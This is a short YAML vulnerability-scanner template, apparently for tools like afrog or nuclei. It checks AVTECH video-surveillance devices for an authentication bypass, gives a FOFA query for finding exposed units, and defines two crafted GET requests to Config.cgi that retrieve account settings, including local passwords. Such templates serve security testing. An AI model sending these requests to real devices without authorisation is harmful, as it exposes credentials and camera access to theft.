id: avtech-password-disclosure

info:
  name: AVTECH 视频监控设备认证绕过
  author: zan8in
  severity: critical
  description: |
    fofa: app="AVTECH-视频监控"
  reference:
    - https://www.seebug.org/vuldb/ssvid-92494

rules:
  r0:
    request:
      method: GET
      path: /cgi-bin/user/Config.cgi?.cab&action=get&category=Account.*
    expression: response.status == 200 && response.body.bcontains(b'Account.Maxuser=') && response.body.bcontains(b'Account.LocalPassword=')
  r1:
    request:
      method: GET
      path: /cgi-bin/user/Config.cgi?/nobody&action=get&category=Account.*
    expression: response.status == 200 && response.body.bcontains(b'Account.Maxuser=') && response.body.bcontains(b'Account.LocalPassword=')
expression: r0() || r1()